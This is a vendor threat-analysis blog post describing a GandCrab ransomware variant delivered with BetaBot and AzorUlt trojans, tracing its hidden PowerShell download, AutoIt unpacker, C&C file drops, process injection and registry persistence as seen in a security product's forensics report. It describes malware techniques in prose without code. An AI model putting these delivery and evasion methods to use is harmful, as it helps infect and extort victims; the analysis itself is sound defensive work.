Check Point Forensic Files: GandCrab Returns with Friends (Trojans)

Following our previous post about GandCrab, in this post we show how another variant of this well-known ransomware is observed by Check Point’s SandBlast Agent (SBA) Behavioral Guard and analyzed through the lens of a SBA Forensics report. In addition, we review how this new variant comes loaded with Trojan malware too, and yet even when attacked on multiple fronts, so to speak, SBA is still able to prevent an infection.


Whereas our last analysis was in respect to Fileless GandCrab, the new variant discussed below does not rely on PowerShell for encryption. In this variant, PowerShell is mainly used for delivering the first stage of the malware combo to end users. In addition, the operation of this malware was seen to be distributed across multiple processes. This may serve as both an evasion technique for traditional malware protections and also increases analysis complexity and reduces compatibility issues. It seems the malware authors really do want to infect the victim with any of the malware variants and go to great lengths to make sure that happens.


Figure 1: Outline of the attack overview. Click here to see the complete overview

As was mentioned previously, GandCrab is an advanced operation with its own affiliate program that offers low skilled threat actors the opportunity to run their own ransomware campaigns.

Figure 2: Bird’s-eye view of the attack by Sand Blast Agent Forensics Report. Click to open the interactive report.


PowerShell as an Entry Point  


From our observation of the above Forensics Report provided by SandBlast Agent, we can understand that the attack begins by launching a hidden PowerShell window with command line arguments to download a secondary payload from an infected hosting provider. Our analysts have confirmed that the online hosted payload is changing frequently in order to escape detection from hash signature based Anti-Viruses.


By viewing the report’s PowerShell process ‘Content Tab’ we can see the entire attack’s script as it was executed. Of course this is due to SBA Behavioral Guard having complete oversight on the PowerShell script that is being run on the Windows 10 Operating System.



Figure 3: The encrypted payload.


As seen from the above screenshot, the payload itself is actually Base64 encoded bytecode of a portable executable (PE) which was made with AutoIt, a freeware automation language for Microsoft Windows. AutoIt generated PE acts as an unpacker to download other binaries from different servers and create multi layered attack scenario to cover all operating systems with different protections. This includes downloading two types of ransomwares and trojans and monitoring the ransomware processes and relaunching them in case there was a crash and abrupt termination. Interestingly, the process has a “Microsoft Windows” signature which has been invalidated. This signature was most likely taken from another signed process and its signature was revoked due to the differences in the checksum.


Figure 4: The fake “Microsoft Windows” signature

Once launched, the newly executed process (mwqtep.exe) waits for 200 seconds and then re-launches itself but now with higher privileges. The malware’s instructions are to:

  1. Pull the C&C URL from the memory by the offset
  2. Build a pseudo random file name
  3. Access the C&C server and drop the malicious files to %TEMP%.
  4. Run the dropped files.

Figure 5: File operations of mwqtep.exe


In total, four new binaries are downloaded to the infected system as part of the secondary payload. The payloads include a variant of Betabot (Also known as Neuvert), AzorUlt data stealer malware and 2 variants of GandCrab ransomware.


Who Runs First?


The BetaBot sample is the first to run. Betabot is a “Swiss army knife” kind of malware. It doesn’t have sole purpose, its behavior is mostly determined by the C2 server. But in order to execute properly and avoid detection it does several things, including injecting itself into explorer.exe. After injections, series of other binaries are downloaded from the CnC server which in short are responsible for the followings:


  • Gather information about the machine
  • Looks for analysis and debugging tools on the machine
  • Detects the virtual machine environment
  • Identify and disable certain Anti-virus and firewall tools


BetaBot is known to be used to steal log-in credentials and financial data of the victim as well however we could not confirm this for the current samples that were analyzed.

Figure 6: BetaBot process injections to explorer.exe

While Betabot uses several persistence techniques, in the sample above a classic registry Autorun method was used to enable the trojan survives a reboot.


Figure 7: BetaBot persistence via registry operations


The second malware that is executed is a variant of AzorUlt data stealer malware. The main characteristic of this malware family is:


  • Harvesting Cryptocurrency wallets saved on the machine
  • Extracting credentials saved in FTP/IM/Email clients
  • Staying dormant on the system and listening for instructions from a CnC server


Check Point’s research team has already dissected this malware family and you can find out more about it here.


In addition to the above trojans, two variants of the GandCrab ransomware are also downloaded. As can be seen in the reports, one of them had actually crashed which resulted in the Windows Error reporting application (werfault.exe) to launch.

Figure 8: The crash and relaunch of the latest variant of GandCrab.


After detecting the crash of the GandCrab ransomware, a second variant of GandCrab is launched and successfully gains privilege escalation. This is then able to continue the attack of encrypting files and writing ransomware message files. At the time of the attack this variant had not been seen in the wild.




As seen from the above screenshots, SandBlast Agent’s Behavioral Guard robust detection engine is capable of adapting to a malware’s evolution over time. It is also sufficiently robust to handle the prevention of several malware variants simultaneously. In this way it can be used to detect and prevent endless types of attacks including those using even legitimate scripting tools maliciously. To help IT security professionals monitor and keep on top of these attacks SandBlast Agent blocks them with ease, remediates them and automatically create a forensics report that details how these actions were taken. In this way, even the most sophisticated of malware is blocked to keep organizations secure and protected.